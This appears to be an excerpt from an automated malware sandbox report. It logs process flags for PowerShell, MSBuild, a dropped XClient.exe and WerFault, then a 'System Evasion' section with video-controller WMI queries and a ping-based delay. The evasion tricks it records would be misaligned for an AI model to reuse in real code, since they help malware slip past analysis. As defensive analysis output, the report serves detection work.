            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeMemory allocated: 4CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
